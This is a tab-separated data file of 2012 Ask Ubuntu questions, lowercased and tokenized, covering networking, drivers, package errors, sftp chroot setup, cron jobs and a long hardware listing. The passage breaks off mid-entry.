134383	unable to ping et1 - routing issue	i have an ubuntu server vm installation with two nics . eth0 is on the lan network , configured by dhcp and is working fine . i manually configured eth1 with a static ip on the dmz network but ca n't ping it , i think this might be a routing issue but i 'm new to this so any help would be appreciated ! please see below for 'ifconfig eth1 ' and 'route -n ' : destination gateway genmask flags metric ref use iface 0.0.0.0 172.20.20.1 0.0.0.0 ug 100 0 0 eth1 172.20.10.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 172.20.20.0 0.0.0.0 255.255.255.0 u 0 0 0 eth1 eth1 link encap : ethernet hwaddr 00:50:56 : ae:00:08 inet addr : 172.20.20.151 bcasr:172.20.20.255 mask:255.255.255.0 inet6 addr : fe80 : :250:56ff : feae:8/64 scope : link up broadcast running multcast mtu:1500 metric:1 rx packets : 23 errors:0 dropped:0 overruns:0 frame:0 tx packets:22 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txquwuwlwn:1000 rx bytes:2306 ( 2.3 kb ) tx bytes:1794 ( 1.7kb ) thanks , charlotte .
134384	using shell find all sub-directories that contain certain files	i am trying to use shell to find all sub-directories in any directory . what i would want is to have a .sh file ( shell script file ) that can receive as a parameter the name of the directory i 'm interested in and the list of files i want to find ( note : i want only sub-directories that have all these files ) . i know i can use this : find $ d -perm -u=rx -type f where d is the directory , -u is the user , r is the users right to read and x is the right to modify i believe , but uhm i have no idea how to make the file accept parameters and i have no idea how to use -u=rx edit : i now understand how to use parameters for a shell script file , so that 's ok . i still do n't get most of the rest . i would love it if someone could either explain the code i mentioned or ... give an alternative ? i 'm also ok with a partial answer , i just need some help .
134385	enabling bluetooth disconnects wireless	i 'm using ubuntu 12.04 lts on a sony vaio vpcsb1z9e . wireless and bluetooth are working fine seperately but they wo n't work at the same time . for example : wireless is connected and working fine when bluetooth is disabled but when i enable bluetooth , in 10 seconds , wireless disconnects from access point and asks for wpa password . how can i get bluetooth work without interfering wireless connection ? thanks in advance !
134388	do compiz in 12.04 support preview of minimized windows ?	i keep on getting previews only for active windows but i 've been told that newer versions of compiz support preview of minimized windows too . who 's right ? and does the option `` keep previews of minimized windows '' in workaraounds help ? i turned it on but to no avail .
134395	setting up dual monitors with integrated graphics	trying to set up dual monitors but the monitors are mirrored and will not change . they also say laptop but i am using a desktop . i have 2 viewsonic monitors at 1080p . i 'm using a sandy bridge cpu with intergrated graphics .
134396	how to set up a secure ubuntu server running a minecraft bukkit server and mysql as a newbie ?	dear ubuntu community , my last post seemed to be too confusing , so i decided to ask my question again ! as the title suggests , i am pretty new to ubuntu server and have only used the ubuntu desktop version so far , and even not very extensively ! my question is , what steps are there to be taken by me , to set up an ubuntu server with standard security , running a minecraft bukkit server . are there any specific extra steps that i would have to perform , other then the ones of a normal setup ? and when it comes to the `` normal setup '' , is there any `` short '' guide ? because i currently do not have month to learn myself into the topic but atmost weeks ... the faster the better ! i know , not a very good approach , but it is very important to me , because my current server community needs a new server ! thank you very much for your help !
134402	cross-platform performance testing tool	i want to compare operating systems by performance on my hardware . is there a cross-platform tool for doing it ? i need results of cpu and graphics performance !
134403	why do so many gnome packages depend on evolution-data-server ?	i was notified of some updates today , but when i looked at the list i saw that they were all about evolution-data-server and evolution-data-server-common . my first thought was that `` i do n't use evolution at all , so why is this stuff on my machine ? '' i then went into synaptic to purge all things evolution and to my dismay , removing the evolution-data-server-common has the side effect of removing all the gnome applets , indicators , and several other useful features . whats up with that ? honestly ...
134410	migrate nautilus file attributes ( icons , positions , folder views ) to another computer	i am using nautilus ' options to add meta-data to files a lot . for example , i use manual positioning of icons , have many files with custom icons and emblems , etc . how can i copy all this meta-information to another computer ? i understand that using rsync or similar classic file copying mechanisms only copy the name , timestamps and contents of files , but the not the luxury stuff nautilus provides . even when i move files via a mounted remote drive via nautulus itself , this metadata is not copied . thanks for any help .
134413	xubuntu - is it better than xfce on ubuntu ?	i really like ubuntu . have used slackware , fedora , and suse . i also love xfce . what i do requieres lots and lots of memory , and usually i have many things running , so a light desktop really helps . but xfce keeps having issues . i mean , one week the upper panel disappears , and i learn how to solve that . the next week , it 's something else . now the desktop is gone , and everywhere i read people recommend a re-install ... now , i installed ubuntu , and then added the xfce desktop . my question is : could my problems be related to installing both unity+gnome+xfce on the same machine ? if i install xubuntu should it be more stable ? has any one had real experience on this ? thanks .
134416	how can i get canon pixma mp780 printer to print ?	after typing sudo apt-get update , i got a message saying some files could not be fetched or were absent , or some older files might have been used . next , after trying to install cnijfilter-mx870series , or any other series ( such as pixusip4100series ) , it said that package could not be found . i 'm having no luck . charles i tried that . it said `` no matches found '' for the canon pixma mp780 . then the next window said the printer was either `` unplugged or turned off . '' still stuck . charles i tried the gimpprint , but when i gave the command to unpack the gutenprint file , i received a message , `` can not open ; no such file or directory . '' charles i tried it again ; it said , `` this does not look like a tar archive '' . am i missing something ? charles
134420	ca n't connect to ms windows share after switching to 12.04	in 8.04 , 9.04 , 10.04 and 11.04 i have been able to connect to a windows 2003 server . it has been simple and effective . since loading 12.04 , i ca n't do it . the error highlights the password ( which works on the 11.04 laptop beside it ) . in fact , no password is acceptable . i have tried it with ubuntu and xubuntu 12.04 with the same result . likewise , the answers posted with `` can not connect to samba share from nautilus '' have not resolved the issue .
134421	how to change ubuntu 12.04 unity volume notification ?	i 'm using unity on ubuntu 12.04 and when i change the volume , i get a different volume indicator than the stock 12.04 notification . based on what i 've found searching through google , it is the gnome volume indicator . how can i change it back ? things i have installed that i think may have affected it : compizconfig settings manager gnome-shell additionally , the notifications have changed color . i tried the solution described here but it did not have any affect on the notifications whatsoever .
134422	shooting 5d mark ii w/ tethered storage but standard capture	i know that it is possible to shoot tethered with tools like gphoto2 . what i am wondering is if it is possible to shoot from the camera as usual and simply use the tether for storage ? i am aware of options like the eye-fi cards but i prefer the tethered option . any suggestions would be appreciated . thanks .
134425	how can i chroot sftp-only ssh users into their homes ?	i want to give a client access to my server , but i want to limit those users to their home directories . i will bind-mount in any files i want them to be able to see . i 've created a user called bob and added him to a new group called sftponly . they have a home directory at /home/bob . i 've changed their shell to /bin/false to stop ssh logins . here is their /etc/passwd line : bob : x:1001:1002 : :/home/bob : /bin/false i 've also changed the /etc/ssh/sshd_config to include the following : match group sftponly chrootdirectory /home/ % u forcecommand internal-sftp allowtcpforwarding no when i try to log in as them , here 's what i see $ sftp bob @ server bob @ server 's password : write failed : broken pipe could n't read packet : connection reset by peer if i comment out the chrootdirectory line i can sftp in but then they have free rein over the server . i have found that chrootdirectory /home works , but it still gives them access to any home directory . i have explicitly tried chrootdirectory /home/bob but that does n't work either . what am i doing wrong ? how can i limit bob to /home/bob/ ? -- -- edit -- -- - okay so i just had a look at /var/log/auth.log and saw this : may 9 14:45:48 nj sshd [ 5074 ] : pam_unix ( sshd : session ) : session opened for user bob by ( uid=0 ) may 9 14:45:48 nj sshd [ 5091 ] : fatal : bad ownership or modes for chroot directory component `` /home/bob/ '' may 9 14:45:48 nj sshd [ 5074 ] : pam_unix ( sshd : session ) : session closed for user bob i 'm not entirely sure what 's going on there , but it suggests something is wrong with the user directory . here is the ls -h /home output : drwxr-xr-x 26 oli oli 4096 2012-01-19 17:19 oli drwxr-xr-x 3 bob bob 4096 2012-05-09 14:11 bob
134428	hybridgraphics vga_switcheroo switch to intel at boot	how can i do that ? i have followed this https : //help.ubuntu.com/community/hybridgraphics but it did n't work i 'm getting the error at boot that the /sys/kernel/debug/vgaswitcheroo/switch do n't exist , so the problem seems to be that the /sys/kernel/debug do n't exist when the grub parameters are processed and it is created after the grub parameter processing . so far i have made an alternative method , which works . in rc.local i granted full access to my user to /sys/kernel/debug then also to /sys/kernel/debug/vgaswitcheroo/switch and then i have made a simple script to switch the graphics to intel and putted it in ~./confif/autostart . the script is executed every time i log in to gnome . it 's working however it would be nice if it worked at boot , as is described at that help.ubuntu.com page . any ideas ? thanks
134430	ubuntu and windows 7	i want to download ubuntu as a second operating system for my laptop . i have windows 7 as my current operating system . i was wondering if i downloaded ubuntu onto my laptop would it erase windows 7 and everything in it ? how could i go about doing this ? thanks
134434	flash not using pulseaudio	i 'm using gstreamer with pavucontrol . when i go to www.google.com and press the 'voice search ' button in either firefox or chrome gstreamer reports a recording device named `` chrome/firefox alsa . '' whenever flash is used , on the other hand , no recording device is present . my microphone will work fine , but no recording device is shown in pavucontrol . this is baffling . do you have an ideas ?
134435	gnucash not showing up in launcher ?	since yesterday ( 8th may 2012 ) i do n't know what has changed - several unity updates come through but now whenever i open gnucash it does n't show in the unity launcher bar when it 's open and i ca n't alt-tab between it and other open applications . this makes it impossible to switch between it and other apps .
134436	does anybody know why the new gnome 3.4 changing wallpaper does not change ?	i 've upgraded from 11.10 to 12.04 and installed gnome 3.4 . i 've selected the default gnome wallpaper which is supposed to change througouht the day but it does not change ...
134437	i can not update or upgrade from 11.10 . how can i troubleshoot this ?	when i try to update or upgrade my ubuntu 11.10 installation through either update manager or the terminal i get a connection error . how can i troubleshoot this ? err us.archive.ubuntu.com/ubuntu oneiric-updates/main firefox amd64 12.0+build1-0ubuntu0.11.10.1 connection failed [ ip : 91.189.92.155 80 ] err security.ubuntu.com/ubuntu oneiric-security/main firefox amd64 12.0+build1-0ubuntu0.11.10.1 connection failed [ ip : 91.189.92.151 80 ] failed to fetch security.ubuntu.com/ubuntu/pool/main/f/firefox/âś connection failed [ ip:91.189.92.151 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing
134441	should i install amd catalyst drivers or the open source drivers to play hon ?	i always have issues while trying to play hon in ubuntu , from what i see in the forums some folks have been able to run it flawlessly and it appears to be a driver issue . now i reinstalled my system when 12.04 lts came out and i have n't installed my video card drivers yet . should i install ati propietary drivers or the open source drivers for best results ? my video card is ati radeon hd 5650 .
134446	problem with german letters like ä , ö , ü when using ubuntuone	when i try to open ubuntuone at my windows 7 pc i get this message : ubuntu one experienced an error -- -- -- -- -- -- -- -- -- -- -- -- -- - sorry , an error has occurred and ubuntu one needs to close . -- -- -- -- -- -- -- -- -- -- -- -- -- - unicodedecodeerror 'ascii' 'c : \\users\\s\xf6ren\\' 10 11 'ordinal not in range ( 128 ) ' i think there is a problem with the `` ö '' in my name and so also in the path of the ubuntuone folder .
134449	macbook 1.1 trackpad not moving diagonally ?	i 'm having problems with my macbookpro1.1 's trackpad under ubuntu 12.04 . whilst moving diagonally , it wiggles from side to side , as if the trackpad 's x and y are conflicting . also , if i move my finger on the trackpad in a perfect circle , it moves in a square-ish shape , like a circle with semi-straight sides . what do i need to install / change ?
134451	gedit causes os crash	i 'm running 12.04 on a dell desktop ( that originally came with just 10.04 installed ) , and when i try to drag a gedit tab from one window to another , the entire system freezes , solvable only with a hard reboot . i 'm not sure how i can get a .crash file from this and will need additional assistance because : i 'm in the middle of finals and do n't have a chance right now to look into it the only thing i can do once the crash happens is switch workspaces and open a terminal with keyboard commands ( though in the terminal alphanumeric characters are all that work - the space bar does nothing and neither does hitting enter . has anyone else seen this problem ? a quick search returned nothing .
134452	regionset fails even there is a readable disc inserted	i just installed ubuntu 12.04 on a dell inspiron 6400 and tried to enable playing of encrypted dvd 's , i made sure libdvdread4is installed and got myself regionset via apt . when i try running it however it tells me regionset version 0.1 -- reads/sets region code on dvd drives error : could not open disc `` ( null ) '' ! please ensure there is a readable cd or dvd in the drive . i tried this as root , as non-root , with an actual encrypted dvd and also with a `` normal '' cd with some pictures on it . they both get automatically mounted .
134453	creating a bootable usb stick on mac os x	i followed the step by step instructions set forth here but none of my macs ( all intel ) will recognize the stick as bootable diskutil list shows the following /dev/disk7 # : type name size identifier 0 : fdisk_partition_scheme *4.0 gb disk7 1 : 0x17 735.3 mb disk7s1 thoughts or help or are the instructions just plain wrong
134470	failed to install octave 's database package on ubuntu	i 'm trying to install octave 's database package on my ubuntu machine . i had installed octave3.2-header before i installed the package , but some errors still exist . octave > pkg install database-1.0.4.tar.gz errors show up : error : called from `pkg > configure_make ' in file /usr/share/octave/3.2.3/m/pkg/pkg.m near line 1253 , column 2 error : called from : error : /usr/share/octave/3.2.3/m/pkg/pkg.m at line 714 , column 5 error : /usr/share/octave/3.2.3/m/pkg/pkg.m at line 287 , column 7 after google around , i still ca n't find the solutions . can anyone help me with this ? please give me more detail information . thanks !
134473	how can i upload folders from my mac to ubuntu one	i use ubuntu one to move files and documents from my mac to my acer and/or iphone . i can easily move individual files but i have a folder with about 200 files that i want to upload . can this be done ?
134482	i still have the ubuntu 11.10 screen while booting	i have upgraded to 12.04 but when i boot the pc i still get the purple 11.10 screen with the white dots . how do i change this ? i am running on an amd64 processor and have an nvidia ge 9300 graphics card
134484	installation problems with gimp 2.8 on kubuntu 12	i 've just upgraded to kubuntu 12.04 and having problems installing gimp 2.8 , i was wondering if anyone can help me ? i 've followed these instructions : sudo add-apt-repository ppa : otto-kesselgulasch/gimp sudo apt-get update sudo apt-get install gimp but get this error : the following packages have unmet dependencies . gimp : depends : libwebkitgtk-1.0-0 ( > = 1.3.10 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . i 've tried running these and trying again with the same problems : sudo apt-get clean sudo apt-get autoremove sudo apt-get update sudo apt-get upgrade sudo apt-get -f install also running sudo apt-get install libwebkitgtk-1.0-0 gives me this error the following packages have unmet dependencies . libwebkitgtk-1.0-0 : depends : libgail18 ( > = 1.18.0 ) but it is not going to be installed e : unable to correct problems , you have held broken packages . and then running sudo apt-get install libgail18 gives me this error the following packages have unmet dependencies . libgail18 : depends : libgtk2.0-0 ( = 2.24.10-0ubuntu6 ) but 2.24.10-1oneiric6~ppa is to be installed e : unable to correct problems , you have held broken packages . the bit that caught my attention was but 2.24.10-1oneiric6~ppa is to be installed - but i do n't know what to do with this . i 've rebooted and the error messages are the same . can anyone help ? ** edit ** i 've found someone with the same problem , unfortunately the link is in german so i ca n't completely understand what the solution ( last post ) is - here 's the google translated link : http : //translate.google.com/translate ? sl=auto & tl=en & js=n & prev=_t & hl=en & ie=utf-8 & layout=2 & eotf=1 & u=http % 3a % 2f % 2fwebcache.googleusercontent.com % 2fsearch % 3fq % 3dcache % 3a1u2uat6xqusj % 3aforum.ubuntuusers.de % 2ftopic % 2fprobleme-nach-update-fehlerhafte-pakete-aus-on % 2f % 2b % 26cd % 3d3 % 26hl % 3den % 26ct % 3dclnk % 26gl % 3duk & act=url
134485	how can i load a local html page on chromium in incognito mode ?	does anyone know how to load a local html page on chromium in incognito mode using a shortcut link or by the terminal ?
134489	revert screen settings on changed by jupiter	i am using ubuntu 11.10 and used jupiter for betty performance . i have selected `` video displays '' to external display only with my account . my display gone just a black screen . how can i recover my display ?
134494	how to get the dash and hud to appear . ( and stop unity spewing error messages . )	i just installed ubuntu 12.04 on my wifes dell inspiron 1501 , which uses an r300 ati graphics chip . neither the dash or hud appear when pushing the appropriate key . when i try unity -- reset & in the terminal , i see that over and over it 's spitting out : r300 : cs space validation failed . ( not enough memory ? ) skipping rendering . this is just after starting ubuntu with no apps open , so i find it hard to believe that just rendering the dash / hud is completely blowing out the vram . any suggestions on getting this working ? /usr/lib/nux/unity_support_test -p shows opengl vendor string : x.org r300 project opengl renderer string : gallium 0.4 on ati rs480 opengl version string : 2.1 mesa 8.0.2 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : yes all sections say `` yes ''
134497	how can i open a .themepack file in ubuntu ?	i have install p7zip-full and p7zip-rar packages to help me in this situation , but default archive of ubuntu file-roller can not open `` windows 7 theme pack '' files , which uses .themepack extensions . how can i open this type of file or is there any known method to do that in ubuntu . in windows `` 7zip '' program can open this kind of file easily . i am using ubuntu 11.10
134503	bad performance with games under wine	i 'm somewhat new to linux . i 've dabbled with it before but never more than just experimentation in a vm or dual boot where i almost always reverted back to windows soon after ( more due to a lack of commitment than a dislike for the os ) . anyway my problem is that in the two games ( guild wars and team fortress 2 ) i 've tried so far i get fairly bad performance . despite both games having a `` platinum '' rating i 've still been forced to run both in directx 8 , otherwise they either crash , have texture defects or the ui is missing . by `` bad performance '' i mean sub-30 fps where there are some players and regular large framerate drops with video settings on low . currently in my mind i believe the performance issues are just a problem with the drivers because my graphics card is a amd 7850 which is virtually brand new and probably not properly supported yet but i 'm unsure and would appreciate advice or tips to improve things . i have ubuntu 12.04 installed and i am usually logged in a gnome classic session . i have installed amd 's proprietary drivers ( catalyst version 12.4 ) and have wine 1.4 installed . i have used winetricks to install dx9/dx10 dlls and other things .
134505	touchscreen broken after installing 12.04	i had natty 11.04 on my computer , and the touch-screen worked perfectly . i have now installed precise 12.04 ( fresh installation , fully updated ) , and the touch-screen is no longer recognised . `` xinput -- list '' on natty gives : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ lite-on technology corp. wireless device id=11 [ slave pointer ( 2 ) ] ⎜ ↳ lite-on technology corp. wireless device id=12 [ slave pointer ( 2 ) ] ⎜ ↳ quanta computer opticaltouchscreen id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ cnfa257 id=8 [ slave keyboard ( 3 ) ] ↳ lite-on technology corp. wireless device id=10 [ slave keyboard ( 3 ) ] however , on 12.04 , `` xinput -- list '' gives : ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ logitech usb receiver id=10 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ power button id=7 [ slave keyboard ( 3 ) ] ↳ cnfa257 id=8 [ slave keyboard ( 3 ) ] ↳ logitech usb receiver id=9 [ slave keyboard ( 3 ) ] notice that xinput on 12.04 does not list the `` quanta computer opticaltouchscreen '' . ( it has also changed the wording of the wireless device , but the wireless works correctly . ) what can i do to get the touch-screen to work again ? more information lsusb shows : bus 001 device 004 : id 0408:3003 quanta computer , inc . according to the bug , it has been solved in the current precise version , which i have . uname -a shows : linux daisy 3.2.0-24-generic # 37-ubuntu smp wed apr 25 08:43:22 utc 2012 x86_64 x86_64 x86_64 gnu/linux however , it does n't work for me . so , i do n't know where to go from here .
134506	`` e : package ‘synaptic’ has no installation candidate '' when trying to install synaptic	ilshat @ lpt : ~ $ sudo apt-get install synaptic reading package lists… done building dependency tree reading state information… done package synaptic is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package ‘synaptic’ has no installation candidate i have tried doing a sudo apt-get update but that does n't work .
134507	oracle java 7 removing error !	fellow linuxeers ! so , i 've had this problem recently when i tried to remove oracle 's java 7 after it did n't want to work correctly . so , when i tried to : sudo apt-get purge oracle-java7-install i get this error at the end of the code : dpkg : error processing oracle-java7-installer ( -- configure ) : subprocess installed post-installation script returned error exit status 1 no apport report written because maxreports is reached already errors were encountered while processing : oracle-java7-installer e : sub-process /usr/bin/dpkg returned an error code ( 1 ) with no other errors in the output . now why ca n't i remove the files ? it really is an annoying problem , because every time i install/remove something in the terminal the error shows up . help ? thanks on forehand !
134510	differences between upstart and systemd	i have read several news sites about systemd and how better it is but i have not yet seen one that actually compares upstart with systemd . actually , i have n't even seen one that talks about the benefits of upstart . so a point to point about the differences , advantages and disadvantages of systemd and upstart would help . right now , all i know is that upstart was developed in canonical and was ported to other distros . that is all .
134512	problem booting in text mode ubuntu 12.04	i made the big mistake of upgrading to ubuntu 12.04 on my computer with nvidia card and the interface is now broken . i have to use unity 2d and the games i used to play with my daughter are not working anymore ( slow as hell ) . i 'm trying to upgrade to the latest nvidia drivers , but i ca n't seem to stop the x server . i tried to boot into console with `` text '' added as argument to kernel - it does n't do anything , i still get a graphical login screen . i tried killing xserver with sudo service lightdm stop i get a stop : unknown instance : if i do a lightdm restart first i can stop it , but i get a garbled console screen on which i ca n't read anything i tried booting into single mode and that worked and then a telinit 3 brought me back to the graphical login screen . what else can i do ? did i overlook something ? i tried to search in many places , but could n't find an answer to my question ( for everybody else the 'text ' option seems to work ) ...
134516	how do i get a broadcom bcm4306 wireless card working ?	so i 'm trying to get a 'broadcom corporation bcm4306 ' wireless card working with an old asus laptop . i 've tried looking at other people 's solutions however so far nothing has worked . i 've tried installing 'firmware-b43-installer ' and 'b43-fwcutter ' but as stated nothing 's happened . the only driver available in the 'additional drivers ' application is the 'software modem ' driver . the wireless does n't work regardless if this is installed or not . i 've tried the top answer from these two threads ask ubuntu thread # 1 ask ubuntu thread # 2
134517	keyboard shortcuts gone from menus in some programs in ubuntu 12.04	i have noticed that keyboard shortcuts from gvim and inkscape are gone from the menus of those programs in ubuntu 12.04 . in ubuntu 10.04 these shortcuts were displayed in the menus . are there ways to get the keyboard shortcuts back and displayed in the menus or is this an ( intended ) feature/bug ? best wishes anders
134520	ubuntu 12.04 window installer edition ?	i am using windows 7 . now , i wish to install ubuntu 12.04 with the windows installer . but i can not install it . please guide me . how can i install ubuntu 12.04 with the windows installer on my computer ?
134521	cron not running scripts	i have looked for several reasons that could cause my problem without luck . the issue seems to be extremely particular : my server running lts 10.04 is not correctly running scripts relating to internet usage . i am trying to update a dynamic dns from my server so that my domain will always point to my server . i ssh to my server to make changes and it 's always running . there are two places i 've put the cron script : 1 ) add a crontab using crontab -e for the current user 2 ) add a file under /etc/cron.d/ ( two different files too ) i made sure that they are owned by root and have access bits for the owner . ruling out a few things : 1 ) all cron scripts work perfectly on my laptop which is also 10.04 lts 2 ) both scripts run perfectly fine when run from the command line . 3 ) on the server if i concat `` hello '' to a file using cron every minute it actually works the simpler of the two scripts to be run has configuration like this : * * * * * root /usr/bin/wget `` -q -- read-timeout=0.0 -- waitretry=5 -- tries=10 -- background http : //freedns.afraid.org/dynamic/update.php ? ... ... ... .. where i 'm hiding the update key and it is followed by a new line . i feel like this must be something specific to cron that i 'm missing out on . i also do not have a cron log file in either /var or /var/log let me know if there is some information i forgot to mention .
134529	how can i power-off the lcd on my thinkpad ?	i 'm using ubuntu 12.04 . when i use fn+f3 on windows the lcd turns off correctly . on ubuntu it just puts the screen in screen saver mode . what should i do to have the same behavior on ubuntu as on windows ?
134531	kubuntu 12.04 - touchpad and keyboard stopped working at random	as in the title , i 've got this problem with my kubuntu 12.04 . at first i 've thought that the whole system was hung , but it happened again 5 minutes ago and , while the keyboard and the touchpad stopped working , the music was still playing , so i guess that 's just an `` input '' problem , because the system was still working ! any solution ? is there some data that you need to know about my setup ? edit : added my lshw outout description : notebook product : n53sv ( ) vendor : asustek computer inc. version : 1.0 serial : b2n0as17695408a width : 64 bits capabilities : smbios-2.6 dmi-2.6 vsyscall32 configuration : boot=normal chassis=notebook family=n uuid=8083f2da-a43e-e081-3f3f-bcaec55f8aa1 *-core description : motherboard product : n53sv vendor : asustek computer inc. physical id : 0 version : 1.0 serial : bsn12345678901234567 slot : middle *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : n53sv.214 date : 08/10/2011 size : 64kib capacity : 2496kib capabilities : pci upgrade shadowing cdboot bootselect edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb smartbattery biosbootspecification *-cpu description : cpu product : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i7-2630qm cpu @ 2.00ghz serial : to be filled by o.e.m . slot : cpu 1 size : 800mhz capacity : 4ghz width : 64 bits clock : 100mhz capabilities : x86-64 fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx rdtscp constant_tsc arch_perfmon pebs bts rep_good nopl xtopology nonstop_tsc aperfmperf pni pclmulqdq dtes64 monitor ds_cpl vmx est tm2 ssse3 cx16 xtpr pdcm pcid sse4_1 sse4_2 x2apic popcnt tsc_deadline_timer xsave avx lahf_lm ida arat epb xsaveopt pln pts tpr_shadow vnmi flexpriority ept vpid cpufreq configuration : cores=4 enabledcores=1 threads=2 *-cache description : l1 cache physical id : 5 slot : l1-cache size : 32kib capacity : 32kib capabilities : internal write-back instruction *-memory description : system memory physical id : 40 slot : system board or motherboard size : 10gib *-bank:0 description : sodimm ddr3 synchronous 1333 mhz ( 0,8 ns ) product : 99u5428-040.a00lf vendor : kingston physical id : 0 serial : 103c28c3 slot : channela-dimm0 size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:1 description : sodimm ddr3 synchronous 1333 mhz ( 0,8 ns ) product : hmt325s6bfr8c-h9 vendor : hynix/hyundai physical id : 1 serial : 58383d1f slot : channela-dimm1 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:2 description : sodimm ddr3 synchronous 1333 mhz ( 0,8 ns ) product : hmt325s6bfr8c-h9 vendor : hynix/hyundai physical id : 2 serial : 58183d19 slot : channelb-dimm0 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-bank:3 description : sodimm ddr3 synchronous 1333 mhz ( 0,8 ns ) product : hmt325s6bfr8c-h9 vendor : hynix/hyundai physical id : 3 serial : 58183c8f slot : channelb-dimm1 size : 2gib width : 64 bits clock : 1333mhz ( 0.8ns ) *-pci description : host bridge product : 2nd generation core processor family dram controller vendor : intel corporation physical id : 100 bus info : pci @ 0000:00:00.0 version : 09 width : 32 bits clock : 33mhz configuration : driver=agpgart-intel resources : irq:0 *-pci:0 description : pci bridge product : xeon e3-1200/2nd generation core processor family pci express root port vendor : intel corporation physical id : 1 bus info : pci @ 0000:00:01.0 version : 09 width : 32 bits clock : 33mhz capabilities : pci pm msi pciexpress normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 ioport : d000 ( size=4096 ) memory : db000000-dc0fffff ioport : c0000000 ( size=301989888 ) *-generic unclaimed description : unassigned class product : illegal vendor id vendor : illegal vendor id physical id : 0 bus info : pci @ 0000:01:00.0 version : ff width : 32 bits clock : 66mhz capabilities : bus_master vga_palette cap_list configuration : latency=255 maxlatency=255 mingnt=255 resources : memory : db000000-dbffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : d000 ( size=128 ) memory : dc000000-dc07ffff *-display description : vga compatible controller product : 2nd generation core processor family integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 09 width : 64 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list rom configuration : driver=i915 latency=0 resources : irq:47 memory : dc400000-dc7fffff memory : b0000000-bfffffff ioport : e000 ( size=64 ) *-communication description : communication controller product : 6 series/c200 series chipset family mei controller # 1 vendor : intel corporation physical id : 16 bus info : pci @ 0000:00:16.0 version : 04 width : 64 bits clock : 33mhz capabilities : pm msi bus_master cap_list configuration : driver=mei latency=0 resources : irq:48 memory : df00b000-df00b00f *-usb:0 description : usb controller product : 6 series/c200 series chipset family usb enhanced host controller # 2 vendor : intel corporation physical id : 1a bus info : pci @ 0000:00:1a.0 version : 05 width : 32 bits clock : 33mhz capabilities : pm debug ehci bus_master cap_list configuration : driver=ehci_hcd latency=0 resources : irq:16 memory : df008000-df0083ff *-multimedia description : audio device product : 6 series/c200 series chipset family high definition audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 05 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:49 memory : df000000-df003fff *-pci:1 description : pci bridge product : 6 series/c200 series chipset family pci express root port 1 vendor : intel corporation physical id : 1c bus info : pci @ 0000:00:1c.0 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport : c000 ( size=4096 ) memory : de600000-deffffff ioport : d4200000 ( size=10485760 ) *-pci:2 description : pci bridge product : 6 series/c200 series chipset family pci express root port 2 vendor : intel corporation physical id : 1c.1 bus info : pci @ 0000:00:1c.1 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:42 ioport : b000 ( size=4096 ) memory : ddc00000-de5fffff ioport : d3700000 ( size=10485760 ) *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : wlan0 version : 01 serial : 48:5d:60 : f2:2c : fd width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-24-generic firmware=n/a ip=192.168.1.6 latency=0 link=yes multicast=yes wireless=ieee 802.11bgn resources : irq:17 memory : ddc00000-ddc0ffff *-pci:3 description : pci bridge product : 6 series/c200 series chipset family pci express root port 4 vendor : intel corporation physical id : 1c.3 bus info : pci @ 0000:00:1c.3 version : b5 width : 32 bits clock : 33mhz capabilities : pci pciexpress msi pm normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:43 ioport : a000 ( size=4096 ) memory : dd200000-ddbfffff ioport : d2c00000 ( size=10485760 ) *-usb description : usb controller product : fl1000g usb 3.0 host controller vendor : fresco logic physical id : 0 bus info : pci @ 0000:04:00.0 version : 04 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress xhci bus_master cap_list configuration : driver=xhci_hcd latency=0 resources : irq:19 memory : dd200000-dd20ffff *-pci:4 description : pci bridge product : 6 series/c200 series chipset family pci express root port 6 vendor : intel corporation physical id 